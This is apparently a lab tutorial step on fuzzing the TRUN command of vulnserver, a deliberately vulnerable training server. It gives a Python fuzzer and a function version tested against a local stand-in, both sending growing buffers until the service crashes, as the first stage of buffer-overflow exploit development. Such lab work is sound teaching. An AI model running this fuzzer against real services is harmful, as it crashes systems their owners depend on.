Step 1: Fuzzing


Restart vulnserver by pressing Ctrl+F2 in Immunity Debugger and then run it by pressing F9. Run the fuzzer against the TRUN command, sending ever-larger buffers until the executable crashes:

fuzzer.py
#!/usr/bin/python3
import sys, socket
from time import sleep

#--------Changeme--------#
                         #
host = "192.168.1.2"     #
port = 9999              #
                         #
#------------------------#

# Start with 100 bytes and grow by 100 bytes per connection. The buffer is
# built directly as bytes (b"") so that no .encode() step can alter it.
buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)          # do not hang forever if the service stops responding
        s.connect((host, port))

        payload = b"TRUN /.:/" + buffer

        print(f"[+] Sending the payload of length {len(buffer)}...")
        s.sendall(payload)       # keep writing until the whole payload has been sent
        s.close()

        sleep(1)
        buffer += b"A" * 100

    except OSError:              # refused, reset or timed out: vulnserver is no longer serving
        print(f"Fuzzer crashed at {len(buffer)} bytes")
        sys.exit()

Here everything is built directly as bytes with the b"" prefix instead of calling .encode() on a str: .encode() applies a text codec (UTF-8 by default), so any character above 0x7F becomes a multi-byte sequence rather than the single raw byte we intended to send.

After a while, vulnserver crashes.

Here we learn that the offset is less than 3000 bytes. We only want to know an approximate value in this step, and we will figure out the exact offset in the next step.
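As an added example (not the tutorial's own script), the same growing-buffer loop is written as a function that returns the length at which the service stopped answering, so the approximate crash length can be used programmatically. It is exercised against a constructed stand-in for vulnserver on 127.0.0.1 so that it runs offline; the stand-in, its crash threshold and its "TRUN COMPLETE" reply are assumptions, not the real binary's behaviour.

```python
import socket
import threading

TRUN_PREFIX = b"TRUN /.:/"

def fuzz_trun(host, port, step=100, limit=3000, timeout=2.0):
    """Send TRUN payloads growing by `step` bytes per connection and return the
    payload length at which the service stopped answering (None if `limit` is hit)."""
    length = step
    while length <= limit:
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(TRUN_PREFIX + b"A" * length)
                s.shutdown(socket.SHUT_WR)   # tell the server we are done sending
                if not s.recv(1024):          # a live service answers; a dead one does not
                    return length
        except OSError:                       # refused, reset or timed out: process is gone
            return length
        length += step
    return None

def start_fake_vulnserver(crash_at):
    """Constructed stand-in for vulnserver (assumption, not the real binary): it
    answers TRUN until a buffer of `crash_at` bytes or more arrives, then dies
    like the overflowed process. Returns the local port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            chunks = []
            while True:                       # read until the client's shutdown (EOF)
                chunk = conn.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
            data = b"".join(chunks)
            if len(data) - len(TRUN_PREFIX) >= crash_at:
                conn.close()
                srv.close()                   # simulated crash: nothing listens any more
                return
            conn.sendall(b"TRUN COMPLETE\n")
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]
```

Against the real target, point fuzz_trun at vulnserver's host and port; the length it returns is the same approximate value the interactive run above gives.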
